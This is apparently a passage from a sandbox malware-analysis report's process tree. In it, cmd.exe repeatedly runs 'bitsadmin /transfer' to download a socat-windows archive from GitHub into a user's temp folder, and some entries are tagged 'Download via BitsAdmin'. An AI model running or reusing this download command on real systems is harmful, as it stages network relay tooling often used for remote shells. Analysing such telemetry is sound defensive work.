                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1396
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:988
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1288
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1444
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:836
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:936
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1720
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1436
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1984
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:632
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2020
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1532
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1192
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1868
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1392
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1060
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:992
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:972
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:616
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1824
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1732
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2024
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1804
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2036
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:832
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1784
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:588
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1260
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
